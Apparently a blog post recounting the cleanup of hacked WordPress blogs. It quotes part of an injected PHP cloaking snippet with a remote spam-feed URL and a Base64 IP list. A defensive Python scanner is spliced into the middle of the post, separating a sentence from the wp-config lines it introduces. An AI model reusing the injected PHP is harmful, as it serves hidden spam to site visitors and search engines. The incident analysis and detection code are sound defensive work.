Well, as you can see, the Web Proxy Blog is back online despite the best efforts of a particularly mean set of hacks. We want to share the details with you, firstly to help you fix your own problems and secondly to help prevent people from making the same mistakes with WordPress that we did.
Firstly, this was a multiple hack across many different domains and blogs, though they all had a few things in common:
They were all run/updated from a computer that was infected with worms, backdoors, trojans and goodness knows what else. Keep your antivirus software up to date!
Secondly, they were all WordPress blogs that should have been updated. The oldest was version 2.0 and the latest was WP 2.6.3. We would have thought that the WordPress 2.6.3 and 2.5 installations would have been safe, but this hack is fairly new.
Finally, all the blogs were on Dreamhost. It could be a coincidence; we would be interested in hearing your comments.
The hacks manifested in a number of ways, but the blogs all looked fine in a browser while having dozens of hidden links at the bottom of each post. Only when I looked through the source code, or switched off the CSS, could the links be seen. Most of the links were for real estate or Lindsay Lohan screensavers or something!
Another thing that was noticeable was that there were strange new files and folders in the blogs, e.g.:
/blog/wp-includes/js/tinymce/themes/advanced/images/xp
In these directories I found files with strange filenames, e.g. 05417e755b378ea9a91fdbe7f71712ce. These files contained the links that were appearing in the footer.
Another thing I noticed was that the wp-blog-header.php file was much larger than the original and had strange code in it:
/* r_start */
$rurl="http://sattan.org/feed/search.php?q=";
$rkeys=array("buy tramadol","tramadol","tramadol online","soma","auto insurance","car insurance","backing up files","car insurance quote","auto insurance quotes","auto insurance company","auto insurance quote","fioricet","insurance quotes",…………………….. religion");
$ips=unserialize(base64_decode("YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4yMzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9"));
$_ip=false; if(is_array($ips)) foreach($ips as $ip) if($ip==$_SERVER['REMOTE_ADDR']){ $_ip=true; break; }
if(sizeof($_COOKIE)==0 && $_ip==false && ……………………..………..
exit;
There was also some strange code in the template footer.php file, with a Base64 string about 1,000 characters long that collected spam links from www.spamreport.ru.
I also found a backdoor file, remv.php, in the root of the WordPress themes directory.
Anyway, I didn't fancy cleaning up that mess, so I decided to make a backup via FTP, delete the old files and do a completely fresh WordPress install. The only problem was that the hack seemed to have changed the folder permissions from 755 to 555, which meant that we couldn't delete our own files!
That was easy enough to fix by setting the attributes back to their proper value, but we did notice a few files and folders that had been modified to 777 (i.e. read/write/execute permission for everyone), confirming our suspicion that this was a mean hack and that the best way to fix it would be to delete everything and start with a fresh installation.
The good news is that once we had done this the blogs were back to normal, with the exception of the pre-2.2 WordPress blogs, which had their character set altered so that pound signs, foreign letters etc. were garbled into "Ä ±" or similar. Removing these two lines from wp-config.php fixed this:
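The three symptoms above (md5-looking filenames in odd directories, unserialize(base64_decode(...)) in a core file, and directories flipped to 555 or 777) can all be found with one pass over the install tree. The following Python scanner is an added example and not code from this post or from WordPress; it builds a constructed, throwaway directory tree that reproduces those symptoms (the file and directory names mirror the ones quoted above, the file contents are made up), scans it, and decodes the exact Base64 literal quoted from the injected wp-blog-header.php to show the serialized PHP array of seven IP addresses it hides. It assumes a baseline of 755 for directories and treats any world-writable file as a finding; adjust that baseline for hosts that use 775.

```python
import base64
import os
import re
import shutil
import stat
import tempfile
from pathlib import Path

# Filenames that are exactly 32 hex characters, like the md5-looking names found under
# wp-includes/js/tinymce/themes/advanced/images/xp.
HEX32_NAME = re.compile(r"^[0-9a-f]{32}$")

# Obfuscation primitives that rarely appear in a legitimate WordPress core file.
SUSPICIOUS_CALLS = re.compile(r"\b(base64_decode|unserialize|eval|gzinflate|str_rot13)\s*\(")

# A quoted Base64 literal long enough to be a payload rather than a short token.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{40,}={0,2})[\"']")

# String members of a serialized PHP array: s:<len>:"<value>";
PHP_SERIALIZED_STRING = re.compile(r's:\d+:"([^"]*)";')

# The literal quoted from the injected wp-blog-header.php in the post.
INJECTED_B64 = ("YTo3OntpOjA7czoxMjoiODEuMTc3LjI2LjIwIjtpOjE7czoxMzoiNjYuMjQ5LjEzLjE1NiI7aToyO3M6MTM6"
                "IjY2LjI0OS4xNC4xNDQiO2k6MztzOjEzOiI2Ni4yNDkuMTQuMTQzIjtpOjY7czoxNDoiMjA5LjU5LjIwMS4y"
                "MzYiO2k6NztzOjEzOiI2Ni4yNDkuMTAuMTQyIjtpOjExO3M6MTE6IjcyLjI5Ljc0LjExIjt9")


def decode_serialized_ips(b64: str) -> list:
    """Decode a Base64 literal and return the string members of the PHP serialized array inside."""
    raw = base64.b64decode(b64).decode("latin-1")
    return PHP_SERIALIZED_STRING.findall(raw)


def scan_tree(root: str) -> dict:
    """Walk a WordPress tree and return findings keyed by category (paths relative to root)."""
    findings = {"hex_names": [], "obfuscated_php": [], "decoded_payloads": [], "bad_perms": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            mode = stat.S_IMODE(os.stat(p).st_mode)
            if mode != 0o755:  # assumed baseline; 555 blocks deletion, 777 invites drops
                findings["bad_perms"].append(f"{os.path.relpath(p, root)} {oct(mode)}")
        for f in filenames:
            p = os.path.join(dirpath, f)
            rel = os.path.relpath(p, root)
            if HEX32_NAME.match(f):
                findings["hex_names"].append(rel)
            mode = stat.S_IMODE(os.stat(p).st_mode)
            if mode & 0o002:  # world-writable file
                findings["bad_perms"].append(f"{rel} {oct(mode)}")
            if f.endswith(".php"):
                text = Path(p).read_text(errors="replace")
                if SUSPICIOUS_CALLS.search(text):
                    findings["obfuscated_php"].append(rel)
                    # Decode any long Base64 literal so the reviewer sees what it hides.
                    for lit in B64_LITERAL.findall(text):
                        try:
                            ips = decode_serialized_ips(lit)
                        except ValueError:
                            continue
                        if ips:
                            findings["decoded_payloads"].append(f"{rel}: {', '.join(ips)}")
    return findings


def build_sample_tree() -> str:
    """Create a constructed, throwaway WordPress-like tree showing the symptoms from the post."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    xp = Path(root, "wp-includes", "js", "tinymce", "themes", "advanced", "images", "xp")
    themes = Path(root, "wp-content", "themes")
    xp.mkdir(parents=True)
    themes.mkdir(parents=True)
    # Benign core-style loader; should produce no findings.
    Path(root, "index.php").write_text("<?php require './wp-blog-header.php';\n")
    # Dropper with an md5-style name holding the hidden links (constructed content).
    (xp / "05417e755b378ea9a91fdbe7f71712ce").write_text('<a href="http://spam.invalid/">x</a>\n')
    # Injected header reproducing the unserialize(base64_decode(...)) line from the post.
    Path(root, "wp-blog-header.php").write_text(
        '<?php\n/* r_start */\n$ips=unserialize(base64_decode("%s"));\n' % INJECTED_B64
    )
    # Stand-in for the remv.php backdoor; the body is deliberately just a comment.
    backdoor = themes / "remv.php"
    backdoor.write_text("<?php /* constructed stand-in for the backdoor body */\n")
    # Normalise directories to 755, then reproduce the odd modes seen after the compromise.
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    os.chmod(themes, 0o555)    # owner can no longer delete their own files
    os.chmod(xp, 0o777)        # world-writable drop directory
    os.chmod(backdoor, 0o666)  # world-writable file
    return root


def demo() -> dict:
    """Build the sample tree, scan it, remove it again, and return the findings."""
    root = build_sample_tree()
    try:
        return scan_tree(root)
    finally:
        for dirpath, dirnames, _ in os.walk(root):  # restore write permission before removal
            for d in dirnames:
                os.chmod(os.path.join(dirpath, d), 0o755)
        shutil.rmtree(root)


if __name__ == "__main__":
    for category, items in demo().items():
        print(category)
        for item in items:
            print("  ", item)
```

Run it against a real install by calling scan_tree("/path/to/blog") instead of demo(). The decoded payload is the interesting part: the injected code compares the visitor's REMOTE_ADDR against that fixed list of seven addresses and checks whether any cookies were sent, which is how the spam links could be served to some visitors while the blog looked normal in an ordinary browser.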
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
You don't need these two lines if you are upgrading from a pre-2.2 version of WordPress because the character sets are already built into the blog.
As a final precaution I reset the MySQL database table password and the WP admin password for good measure. We also reset the FTP password, because I suspect this was a hack across so many levels that just about every one of my usernames and passwords has been compromised.
So, that’s how I spent most of my Sunday! Anyone have similar experiences, shortcuts etc. they want to share?